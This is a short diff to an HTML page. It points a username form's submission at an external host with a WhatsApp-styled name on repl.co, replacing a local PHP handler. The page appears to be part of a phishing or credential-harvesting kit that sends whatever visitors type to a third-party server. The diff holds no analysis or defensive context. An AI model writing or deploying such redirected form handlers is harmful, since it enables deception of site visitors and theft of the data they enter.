--- a/ndex.html
+++ b/ndex.html
@@ -8,7 +8,7 @@
 </center>
 <br><br><br>
 <div class="form-wrap">
-                  <form action="secondlayer.php" method="post">
+                  <form action="https://whatsapp.jinxvweb.repl.co/secondlayer.php" method="post">
 
                     <div class="input-box">
                       <input type="text" id="name" aria-describedby="" placeholder="তাড়াতাড়ি লেখ😪......" aria-required="true" maxlength="900" autocapitalize="off" autocorrect="off" name="username" value="" required>
